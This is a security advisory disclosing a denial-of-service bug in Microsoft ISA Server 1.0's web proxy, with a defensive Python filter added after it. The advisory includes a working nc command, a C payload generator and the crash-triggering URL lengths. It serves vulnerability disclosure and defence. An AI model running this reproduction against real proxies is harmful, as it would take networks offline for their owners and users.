FSC Internet Corp. / SecureXpert Labs Advisory [SX-20010320-2]

Denial of Service in Microsoft ISA Server v1.0

Summary

Microsoft ISA Server 1.0 on Windows 2000 Server SP1 is vulnerable to a simple network-based attack which stops all incoming and outgoing web traffic from passing through the firewall until the firewall is rebooted or the affected service is restarted. If the firewall is configured to use the "Web Publishing" feature (inbound HTTP proxy to a web server), this attack can be performed remotely.

Details

Microsoft ISA Server includes a web proxy component (W3PROXY.EXE) that is used both for the "publishing" of internal web servers to the external network and for proxying of internal requests to external web servers. Sending a URL with a long pathname component to this proxy will cause it to terminate with an access violation error.

For example, sending the (valid) HTTP request:

    GET http://hostname/aaa[3000 more occurrences of 'a'] HTTP/1.0\n\n

to port 80 on the ISA Server's external interface will cause W3PROXY.EXE to terminate with an access violation.

This can easily be reproduced from a Linux system by using the following simple shell command:

    printf "GET http://${HOST}/%s HTTP/1.0\n\n" `./repeat ${x} ${y}` | \
        nc ${HOST} 80

where:

- printf is the shell utility of that name
- ${HOST} is an environment variable set to a hostname which resolves to the external IP of the ISA server
- ./repeat is the simple C program whose source is given below
- ${x} is the ASCII value of the character to insert into the generated URL
- ${y} is the number of repetitions of ${x}

The `repeat' program can be compiled from the following simple C source:

    /*
     * repeat.c -- quick-n-dirty hack to output argv[2] instances of the
     * character whose ASCII value is given as argv[1]
     *
     * WARNING - this has absolutely no error checking!
     */
    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char **argv)
    {
        int character;
        long repetitions, i;

        if (argc != 3) {
            printf("usage: repeat char reps\n");
            exit(1);
        }
        character = atoi(argv[1]);     /* ASCII value of the character to emit */
        repetitions = atol(argv[2]);   /* number of copies to write */
        for (i = 0L; i < repetitions; i++) {
            printf("%c", character);
        }
        return 0;
    }

The behaviour of W3PROXY.EXE depends both on the value of ${x} and the value of ${y}. With ${x} of 55, the following behaviour is observed for these values of ${y}:

    100:  processes correctly, returns "404 Object Not Found" from the target web server
    200:  returns 404
    250:  returns 404
    254:  returns 404
    255:  returns "414 URL Too Long"
    260:  returns 414
    300:  returns 414
    2000: returns 414
    2100: returns 414
    2200: returns 414
    2300: returns 414
    2300, repeated several times: W3PROXY.EXE grows to 128MB of process size and is then terminated with an access violation
    2350: W3PROXY.EXE is terminated on the first attempt
    All larger values: as 2350, above

With different values of ${x}, different behaviour is observed for some values of ${y}. This, along with preliminary analysis of the Dr. Watson logs generated upon termination of W3PROXY.EXE, initially suggested that an exploitable overflow may have been present. However, source code analysis by Microsoft has indicated that only a heap overflow is present, and therefore that this vulnerability is not exploitable beyond denial of service.

Status

Microsoft Corp. was informed of this vulnerability on April 2, 2001. A hotfix to address this issue will be released on April 16, 2001, synchronized with the release of this advisory.

Credits

Richard Reiner, SecureXpert Labs
Graham Wiseman, SecureXpert Labs
Matthew Siemens, SecureXpert Labs
Kent Nicolson, SecureXpert Labs

About SecureXpert DIRECT

SecureXpert DIRECT is an advance security advisory service provided to qualified subscribers by SecureXpert Labs. Subscriptions are free of charge and may be obtained at http://www.securexpert.com/services.html.
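A defensive guard built from the thresholds reported in the Details section, added here as an example and not part of the SecureXpert advisory: it parses proxy-style request lines, answers 414 itself for anything over the 254-character limit so the request never reaches W3PROXY.EXE, and flags sources that repeat over-limit or crash-range requests. The 10.x addresses, the `req` helper and the guard's function names are assumptions made for this example.

```python
import re
from collections import Counter

# Limits from the advisory's observations with ${x}=55: up to 254 repeated
# characters were proxied, 255+ drew "414 URL Too Long", 2300 sent several
# times (or 2350 once) crashed W3PROXY.EXE. Length counts chars after "host/".
MAX_URL_CHARS = 254
CRASH_RANGE = 2300

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")
ABSOLUTE_HTTP = re.compile(r"^http://([^/\s]+)/?(\S*)$")

def classify_request_line(line):
    """Return (status, chars_after_host, note). Status 200 means 'pass to
    the proxy'; anything else is answered by the guard itself so the
    oversized URL never reaches W3PROXY.EXE."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return (400, 0, "malformed request line")
    u = ABSOLUTE_HTTP.match(m.group(2))
    if not u:
        return (400, 0, "proxy requests must use an absolute http:// URL")
    n = len(u.group(2))
    if n > MAX_URL_CHARS:
        return (414, n, "crash-range length" if n >= CRASH_RANGE else "over limit")
    return (200, n, "forwarded")

def flag_sources(records, repeats=3):
    """Return sources that sent `repeats` or more over-limit requests, or
    any crash-range request (the crash followed repeated 2300-char URLs)."""
    hits, flagged = Counter(), set()
    for src, line in records:
        status, n, _ = classify_request_line(line)
        if status == 414:
            hits[src] += 1
            if n >= CRASH_RANGE or hits[src] >= repeats:
                flagged.add(src)
    return sorted(flagged)

def req(n):
    """Constructed request line in the advisory's 'aaa...' form, n chars long."""
    return "GET http://hostname/" + "a" * n + " HTTP/1.0"
# Constructed sample traffic (not captured data); source addresses are made up.
SAMPLE = [("10.0.0.5", "GET http://hostname/index.html HTTP/1.0"),
          ("10.0.0.9", req(254))] + [("10.0.0.9", req(300))] * 3 + \
         [("10.0.0.7", req(3000))]

if __name__ == "__main__":
    print("flagged:", flag_sources(SAMPLE))  # flagged: ['10.0.0.7', '10.0.0.9']
```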